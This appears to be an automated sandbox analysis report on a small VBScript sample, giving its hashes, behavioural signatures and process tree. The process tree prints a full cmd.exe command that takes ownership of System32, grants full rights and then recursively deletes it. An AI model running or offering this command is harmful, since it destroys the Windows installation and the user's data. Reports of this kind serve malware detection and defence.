Analysis
max time kernel: 148s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-05-2024 16:19
Static task: static1
Behavioral task: behavioral1
Sample: target.vbs
Resource: win7-20240419-en
General
Target: target.vbs
Size: 209B
MD5: fe505a5e05c25e1b991d6f6094899bdf
SHA1: 3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
SHA256: dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
SHA512: c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f
Malware Config
Signatures
Drops file in Drivers directory (64 IoCs)
Processes: cmd.exe
Manipulates Digital Signatures (1 IoC)
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
Processes: cmd.exe
  description: File opened for modification; ioc: C:\Windows\System32\wintrust.dll; process: cmd.exe
Possible privilege escalation attempt (2 IoCs)
Processes: takeown.exe, icacls.exe
  pid 3588: takeown.exe
  pid 1640: icacls.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation; process: WScript.exe
Loads dropped DLL (12 IoCs)
Processes:
  pid 2748 (12 entries; process column empty in the report)
Modifies file permissions (1 TTPs, 2 IoCs)
Processes: takeown.exe, icacls.exe
  pid 3588: takeown.exe
  pid 1640: icacls.exe
Drops file in System32 directory (64 IoCs)
Processes: cmd.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: takeown.exe
  description: Token: SeTakeOwnershipPrivilege; pid 3588; process: takeown.exe
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: WScript.exe, cmd.exe
  PID 2552 (WScript.exe) wrote to memory of 3560 (cmd.exe)
  PID 2552 (WScript.exe) wrote to memory of 3560 (cmd.exe)
  PID 3560 (cmd.exe) wrote to memory of 3588 (takeown.exe)
  PID 3560 (cmd.exe) wrote to memory of 3588 (takeown.exe)
  PID 3560 (cmd.exe) wrote to memory of 1640 (icacls.exe)
  PID 3560 (cmd.exe) wrote to memory of 1640 (icacls.exe)
Processes
[1] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
        - Drops file in Drivers directory
        - Manipulates Digital Signatures
        - Drops file in System32 directory
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\takeown.exe
            Command line: takeown /f C:\Windows\System32 /r /d y
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\system32\icacls.exe
            Command line: icacls C:\Windows\System32 /grant administrators:F /t
            - Possible privilege escalation attempt
            - Modifies file permissions
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads